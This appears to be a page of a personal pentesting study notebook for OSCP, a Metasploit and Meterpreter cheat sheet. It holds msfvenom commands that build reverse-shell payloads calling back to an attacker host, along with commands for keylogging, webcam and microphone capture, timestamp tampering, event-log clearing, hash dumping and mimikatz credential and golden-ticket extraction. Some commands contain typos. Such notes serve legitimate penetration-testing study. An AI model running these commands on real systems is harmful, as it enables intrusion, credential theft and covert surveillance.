Pentesting Quick Reference OSCP and Beyond
  • Basic Tools & Techniques
  • Linux Basics
  • Windows Basics
  • Shells
  • Uploading Shells/ Transferring Files
  • FootPrinting
  • Host Discovery
  • Scanning
  • Vulnerability assessment
  • Metasploit and Meterpreter
    • Payloads
  • Brute Forcing/ Password Cracking
    • Attacking LSASS Passwords
    • Credentials Hunting Windows
    • Credential Hunting in Linux
    • Passwd, Shadow & Opasswd
    • Pass the Hash (PtH)
    • Protected Files
    • Protected Archives
    • Password Policies
    • Password Managers
    • Breached Credentials
    • Mimikatz
  • Linux Remote Management Protocols
  • Windows Remote Management Protocols
  • Port 20/21 - FTP Pentesting
  • Port 23 Telnet
  • Port 25 - SMTP
  • IMAP/ POP3
  • Port 53 DNS
  • Port 445 - SMB
  • Port 111 -RPC Bind
  • Port 135 - RPC
  • Port 137 NetBios
  • Port 161 SNMP
  • Port 1433 - MSSQL
  • Port 1521 Oracle TNS
  • Port 1833 - MQTT
  • Port 2049 - NFS
  • Port 3306 MySQL
  • Port 3389 - RDP
  • Port 5985 - Winrm
  • Port 632 (UDP) IPMI
  • Redis (6379)
  • Port 10000 Webmin
  • Privilege Escalation
    • Windows Priv esc
    • Linux Priv esc
  • Active Directory
    • AD Basics
      • AD Management Basics
    • Initial Enumeration of AD
      • Enumerating AD Users
    • Password Spraying
      • Enumerating & Retrieving Password Policies
      • Password Spraying - Making a Target User List
      • Internal Password Spraying - from Linux
      • Internal Password Spraying - from Windows
      • Enumerating Security Controls
    • LLMNR Poisoning
    • SMB/ NTLM Relay Attacks
    • IPv6 Attacks
      • IPV6 DNS takeover
      • WPAD
    • Passback Attacks
    • AS-REP roasting
    • AD Shell
    • AD Enumeration
      • Credentialed Enumeration - from Linux
      • Credentialed Enumeration - from Windows
      • Living off the Land
      • BloodHound
      • Plumhound
      • Bloodhound CE
      • ldapdomaindump
      • PingCastle
    • Post Compromise
      • Kerberosting
        • Kerberos "Double Hop" Problem
      • Pass Attacks
        • Pass the Hash
        • Pass the Ticket
          • Pass the Ticket (PtT) from Windows
          • Pass the Ticket (PtT) from Linux
      • Token Impersonation
      • LNK File Attacks
      • Miscellaneous Misconfigurations
    • Access Control List (ACL) Abuse Primer
      • ACL Enumeration
      • ACL Abuse Tactics
      • DCSync
        • DCSync Example Forest HTB
    • Post Owning Domain
      • Attacking Active Directory & NTDS.dit 1
      • Golden Ticket Attacks
    • Privilege Escaltion
    • Bleeding Edge Vulnerabilities
    • Domain Trusts
      • Attacking Domain Trusts - Child -> Parent Trusts - from Windows
      • Attacking Domain Trusts - Child -> Parent Trusts - from Linux
      • Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows
      • Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux
    • Hardening Active Directory
    • Additional AD Auditing Techniques
    • HTB AD Enumeration & Attacks - Skills Assessment Part I
  • Web Pentesting
    • Subdomains, directories and Vhost listing
    • Command Injection
    • XSS
    • SQL Injection
    • Authentication Bypass
  • Cryptography
  • More Resources
  • Forensics
  • IoT Security
  • API Security
  • Binary Exploitation
    • Assembly Cheatsheat for Hackers
    • Malware Analysis
      • Basic Static Malware Analysis
  • Boxes/ Machines
    • Try Hack Me
      • Vulnversity
      • Basic Pentesting
      • Kenobi
      • Steel Mountain
    • Vulnhub
      • Tiki
    • HTB
      • Beep
      • Active
      • Forest
      • Devel
    • Metasploitable 2
    • PWN.COLLEGE Talking Web
    • PWN COLLGE Web Hacking
  • Private Challenges
    • Pwn
    • Forensics
  • Misc tools
    • NetExec
  • SOC Analyst Resources
  • OSCP Tips and Misc
  • Mobile Hacking
  • Buffer Overflow
  • Wordpress
  • Web3 and Blockchain Security
  • WIFI Hacking
    • WPS Hacking
    • Misc Tools
Powered by GitBook
On this page
  • Basic commands
  • Finding files in meterpreter
  • Payloads
  • List Payloads
  • Multi handler
  • Hidden files in shell
  • List all running services in shell
  • Other shell commands
  • Dumping hashes in meterpreter
  • Metasploit Scanners
  • Meterpreter commands
  • File system commands
  • Networking commands
  • System commands
  • Others Commands (these will be listed under different menu categories in the help menu)
  • Meterpreter Modules
  • Loading Kiwi (mimikatz)
  • Gather domain info with post exploitation module
  • Shares with metasploit
  • Dumping hashes
  • Revert to original user

Metasploit and Meterpreter

Basic commands

show payloads  \\to list all payloads
info     \alternative of show options, give more details
search type:auxiliary telnet    \\to limit search to particular module types
unset  \\to revert settings options
setg   \to set option for all current and future selected modules
exploit -z  \\background the session
getpid \\ get process ID

Finding files in meterpreter

search -f flag*.txt (in meterpreter)

Payloads

List Payloads

msfvenom -l payloads 
msfvenom --list formats  \\output formats
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.ex

Based on the target system's configuration (operating system, install webserver, installed interpreter, etc.), msfvenom can be used to create payloads in almost all formats. Below are a few examples you will often use:

In all these examples, LHOST will be the IP address of your attacking machine, and LPORT will be the port on which your handler will listen. The .elf format is comparable to the .exe format in Windows. These are executable files for Linux. However, you may still need to make sure they have executable permissions on the target machine. For example, once you have the shell.elf file on your target machine, use the chmod +x shell.elf command to accord executable permissions. Once done, you can run this file by typing ./shell.elf on the target machine command line.

Linux Executable and Linkable Format (elf)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf

Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe

PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php

ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp

Python
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py

If msf is having some error start database service

service postgresql start

Multi handler

use exploit/muli.handler
exploit -j -z //runs in background

Useful commands meterpreter

sysinfo
getuid
ifconfig
pwd \\(mostly downloads folder)
ls
cat
cd
keyscan_start //keylogger
keyscan-dump
idletime

To modify the timestamp MACE (modified, accessed,created,entry) attributes

timestomp secret.ext -m "2/11/2022 8:10:03"

To view timestamp entries

timestomp secret.ext -v

-a accessed

-c created

-e entry modified

Hidden files in shell

First get the shell, then use the following command.

dir /a:h

List all running services in shell

sc querytex type=service state=all

Other shell commands

netsh firewall show state \\firewall state
netsh firewall show config
wmic cpu get 
wmic /node:"" product get name,version,vendor
wmic useraccount get name,sid
wmic os where Primary='TRUE' reboot //restarts system

Dumping hashes in meterpreter

hashdump   // or try the following
use post/windows/gather/smart_hashdump

Metasploit Scanners

scanner/discovery/udp_sweep
auxiliary/scanner/http/http_version

Meterpreter commands

Core commands will be helpful to navigate and interact with the target system. Below are some of the most commonly used. Remember to check all available commands running the help command once a Meterpreter session has started. Core commands

  • background: Backgrounds the current session

  • exit: Terminate the Meterpreter session

  • guid: Get the session GUID (Globally Unique Identifier)

  • help: Displays the help menu

  • info: Displays information about a Post module

  • irb: Opens an interactive Ruby shell on the current session

  • load: Loads one or more Meterpreter extensions

  • migrate: Allows you to migrate Meterpreter to another process

  • run: Executes a Meterpreter script or Post module

  • sessions: Quickly switch to another session

  • ps: Running Processes

File system commands

  • cd: Will change directory

  • ls: Will list files in the current directory (dir will also work)

  • pwd: Prints the current working directory

  • edit: will allow you to edit a file

  • cat: Will show the contents of a file to the screen

  • rm: Will delete the specified file

  • search: Will search for files

  • upload: Will upload a file or directory

  • download: Will download a file or directory

Networking commands

  • arp: Displays the host ARP (Address Resolution Protocol) cache

  • ifconfig: Displays network interfaces available on the target system

  • netstat: Displays the network connections

  • portfwd: Forwards a local port to a remote service

  • route: Allows you to view and modify the routing table

System commands

  • clearev: Clears the event logs

  • execute: Executes a command

  • getpid: Shows the current process identifier

  • getuid: Shows the user that Meterpreter is running as

  • kill: Terminates a process

  • pkill: Terminates processes by name

  • ps: Lists running processes

  • reboot: Reboots the remote computer

  • shell: Drops into a system command shell

  • shutdown: Shuts down the remote computer

  • sysinfo: Gets information about the remote system, such as OS

Others Commands (these will be listed under different menu categories in the help menu)

  • idletime: Returns the number of seconds the remote user has been idle

  • keyscan_dump: Dumps the keystroke buffer

  • keyscan_start: Starts capturing keystrokes

  • keyscan_stop: Stops capturing keystrokes

  • screenshare: Allows you to watch the remote user's desktop in real time

  • screenshot: Grabs a screenshot of the interactive desktop

  • record_mic: Records audio from the default microphone for X seconds

  • webcam_chat: Starts a video chat

  • webcam_list: Lists webcams

  • webcam_snap: Takes a snapshot from the specified webcam

  • webcam_stream: Plays a video stream from the specified webcam

  • getsystem: Attempts to elevate your privilege to that of local system

  • hashdump: Dumps the contents of the SAM database

Although all these commands may seem available under the help menu, they may not all work. For example, the target system might not have a webcam, or it can be running on a virtual machine without a proper desktop environment.

Meterpreter Modules

you can also use the load command to leverage additional tools such as Kiwi or even the whole Python language.

Loading Python

meterpreter > load python
Loading extension python...Success.
meterpreter > python_execute "print 'TryHackMe Rocks!'"
[+] Content written to stdout:
TryHackMe Rocks!

meterpreter >

The post-exploitation phase will have several goals; Meterpreter has functions that can assist all of them.

  • Gathering further information about the target system.

  • Looking for interesting files, user credentials, additional network interfaces, and generally interesting information on the target system.

  • Privilege escalation.

  • Lateral movement.

Once any additional tool is loaded using the load command, you will see new options on the help menu. The example below shows commands added for the Kiwi module (using the load kiwi command).

Loading Kiwi (mimikatz)

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( [email protected] )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.

These will change according to the loaded menu, so running the help command after loading a module is always a good idea.The updated help menu

Kiwi Commands
=============

    Command                Description
    -------                -----------
    creds_all              Retrieve all credentials (parsed)
    creds_kerberos         Retrieve Kerberos creds (parsed)
    creds_msv              Retrieve LM/NTLM creds (parsed)
    creds_ssp              Retrieve SSP creds
    creds_tspkg            Retrieve TsPkg creds (parsed)
    creds_wdigest          Retrieve WDigest creds (parsed)
    dcsync                 Retrieve user account information via DCSync (unparsed)
    dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync
    golden_ticket_create   Create a golden kerberos ticket
    kerberos_ticket_list   List all kerberos tickets (unparsed)
    kerberos_ticket_purge  Purge any in-use kerberos tickets
    kerberos_ticket_use    Use a kerberos ticket
    kiwi_cmd               Execute an arbitary mimikatz command (unparsed)
    lsa_dump_sam           Dump LSA SAM (unparsed)
    lsa_dump_secrets       Dump LSA secrets (unparsed)
    password_change        Change the password/hash of a user
    wifi_list              List wifi profiles/creds for the current user
    wifi_list_shared       List shared wifi profiles/creds (requires SYSTEM)

Gather domain info with post exploitation module

use post/windows/gather/enum_domain
set SESSIONS 1
exploit

Shares with metasploit

post/windows/gather/enum_shares

Dumping hashes

hashdump

If it does not work migrate to some privilede process like lass.exe and then try the command

ps
migrate 764
hashdump 

Revert to original user

if you pivot somewhere, we can move back with following

rev2self
PreviousVulnerability assessmentNextPayloads

Last updated 8 days ago